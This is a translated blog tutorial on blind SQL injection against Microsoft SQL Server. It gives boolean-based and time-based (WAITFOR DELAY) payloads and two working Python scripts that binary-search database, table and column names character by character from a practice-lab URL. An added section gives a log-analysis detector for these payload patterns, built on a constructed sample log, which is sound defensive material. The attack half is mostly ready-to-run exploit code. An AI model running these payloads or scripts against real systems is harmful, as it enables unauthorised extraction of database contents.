SQL Server from 0 to 1: Blind Injection

Published: January 5, 2024

Boolean-based blind injection (with a visible response difference)

1. Brute-forcing the database name:

ascii(substring(db_name(),1,1))=95
# Use substring to take the string apart one character at a time and compare the ASCII code

2. Brute-forcing table names:

1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,1,1))<95)
# Filter with a condition and use count to get the number of rows returned; a result of 1 means a match, i.e. the guess is correct

3. Brute-forcing column names:

ascii(substring((SELECT TOP 1 column_name FROM information_schema.columns where table_name='users'),1,1))<95
# Compare ASCII codes

4. Brute-forcing data:

ascii(substring((select top 1 username from users),1,1))<95

A simple script is attached:

import sys
import requests

url = 'http://192.168.0.105/less-1.asp'

result = ''
for num in range(1, 100):
    # Search the ASCII range 32-128 by bisection
    pointer = 1
    low = 32
    high = 128
    # num is the character position currently being brute-forced
    # pointer is the ASCII value currently being tested
    while 1:
        pointer = low + (high - low) // 2
        if low == pointer:
            # The range has collapsed to a single value; 127 (or 0) means we ran past the end of the string
            if pointer == 127 or pointer == 0:
                sys.exit()
            result += chr(pointer)
            print(result)
            break

        # Enumerate database names
        # payload = f"?id=1' and ascii(substring((select top 1 name from master.dbo.sysdatabases),{num},1)) < {pointer}--+"
        # Enumerate table names
        # payload = f"?id=1' and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,{num},1))<{pointer})--+"
        # Enumerate column names
        payload = f"?id=1' and ascii(substring((SELECT TOP 1 column_name FROM information_schema.columns where table_name='users'),{num},1))<{pointer}--+"
        result_html = requests.get(url=url + payload).text
        # print(result_html)
        if r"Your Login name" in result_html:
            # Condition true: the character's ASCII code is below pointer
            high = pointer
        else:
            low = pointer

Time-based blind injection (no visible response)

Introduce a delay with WAITFOR DELAY

;if (ascii(substring(db_name(),2,1)))=101 WAITFOR DELAY '0:0:5'
# Unlike MySQL, an IF cannot be appended after the WHERE clause here; the IF statement can only be added through stacked queries to trigger the delay
The procedure is essentially the same as for boolean-based blind injection, so here is the script directly:
import sys
import time
import requests

url = 'http://192.168.0.105/less-1.asp'

result = ''
for num in range(1, 100):
    # Search the ASCII range 32-128 by bisection
    pointer = 1
    low = 32
    high = 128
    # num is the character position currently being brute-forced
    # pointer is the ASCII value currently being tested
    while 1:
        pointer = low + (high - low) // 2
        if low == pointer:
            # The range has collapsed to a single value; 127 (or 0) means we ran past the end of the string
            if pointer == 127 or pointer == 0:
                sys.exit()
            result += chr(pointer)
            print(result)
            break

        # Enumerate database names
        payload = f"?id=1';if(ascii(substring((select top 1 name from master.dbo.sysdatabases),{num},1))) < {pointer} WAITFOR DELAY '0:0:1'--+"
        # Enumerate table names
        # payload = f"?id=1' if(1)=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,{num},1))<{pointer}) WAITFOR DELAY '0:0:1'--+"
        # Enumerate column names
        # payload = f"?id=1';if(ascii(substring((SELECT TOP 1 column_name FROM information_schema.columns where table_name='users'),{num},1)))<{pointer} WAITFOR DELAY '0:0:1'--+"
        # print(url + payload)
        try:
            # A response within the timeout means the delay did not fire, i.e. the condition was false
            requests.get(url=url + payload, timeout=0.5)
            low = pointer
        except requests.exceptions.Timeout:
            # The 1-second WAITFOR DELAY fired, so the condition was true
            high = pointer
        time.sleep(0.2)
    time.sleep(1)

Note that blind injection could also be done with LIKE and wildcards, but when comparing ascii() values, binary search cuts the number of requests considerably, so the LIKE approach is not repeated here to save everyone's time; binary search is recommended.
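Seen from the defensive side, both scripts above leave a distinctive trace: one client sends a burst of near-identical requests in which only the character position and the ASCII bound change, and the time-based variant adds WAITFOR DELAY. The following Python is an added example, not part of the original post: it parses Common Log Format lines, flags the SQL Server markers used above (ascii(substring(, WAITFOR DELAY, sysobjects/sysdatabases/information_schema) and reports clients whose flagged requests form such a sweep. The log lines, client IPs and the reporting threshold are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote
# Markers taken from the payload shapes shown above (case-insensitive).
MARKERS = {
    "ascii_substring": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),
    "waitfor_delay": re.compile(r"waitfor\s+delay", re.I),
    "sqlserver_catalog": re.compile(r"\bsys(objects|databases)\b|information_schema\.", re.I),
}
# Common Log Format: ip ident user [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*"')

def classify_request(path):
    """Return (decoded path, names of the markers it contains); the set is empty for a clean request."""
    # Double-decode so nested encoding does not hide a quote; '+' is a space in a query string.
    decoded = unquote(unquote(path)).replace("+", " ")
    return decoded, {name for name, rx in MARKERS.items() if rx.search(decoded)}

def analyse(lines, threshold=3):
    """Per client IP with at least `threshold` flagged requests: the flagged count and the largest
    'sweep', i.e. distinct payloads sharing one template once digits (position, ASCII bound) are masked."""
    flagged = Counter()
    sweeps = defaultdict(set)  # (ip, digit-masked template) -> distinct concrete payloads
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.group("ip"), m.group("path")
        decoded, names = classify_request(path)
        if not names:
            continue
        flagged[ip] += 1
        sweeps[(ip, re.sub(r"\d+", "N", decoded))].add(decoded)
    return {
        ip: {"flagged": n, "largest_sweep": max(len(v) for (i, _), v in sweeps.items() if i == ip)}
        for ip, n in flagged.items() if n >= threshold
    }

# Constructed sample log (not real traffic): a benign request, a bisection burst from 203.0.113.5
# against position 1 of db_name(), and a single time-based probe from another client.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jan/2024:10:00:01 +0800] "GET /less-1.asp?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [05/Jan/2024:10:00:02 +0800] "GET /less-1.asp?id=1'%20and%20ascii(substring(db_name(),1,1))<80--+ HTTP/1.1" 200 512
203.0.113.5 - - [05/Jan/2024:10:00:02 +0800] "GET /less-1.asp?id=1'%20and%20ascii(substring(db_name(),1,1))<104--+ HTTP/1.1" 200 498
203.0.113.5 - - [05/Jan/2024:10:00:03 +0800] "GET /less-1.asp?id=1'%20and%20ascii(substring(db_name(),1,1))<92--+ HTTP/1.1" 200 512
203.0.113.5 - - [05/Jan/2024:10:00:03 +0800] "GET /less-1.asp?id=1'%20and%20ascii(substring(db_name(),1,1))<98--+ HTTP/1.1" 200 498
198.51.100.7 - - [05/Jan/2024:10:05:00 +0800] "GET /less-1.asp?id=1'%3Bif%20(ascii(substring(db_name(),2,1)))%3D101%20WAITFOR%20DELAY%20'0:0:5'--+ HTTP/1.1" 200 512
"""

REPORT = analyse(SAMPLE_LOG.splitlines())  # -> {'203.0.113.5': {'flagged': 4, 'largest_sweep': 4}}
```

The single probe from 198.51.100.7 stays below the default threshold; lowering it to 1 surfaces that client too, which is the trade-off between catching a slow attacker and alerting on one-off scanner noise.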

Source: https://blog.csdn.net/2301_80520893/article/details/135335248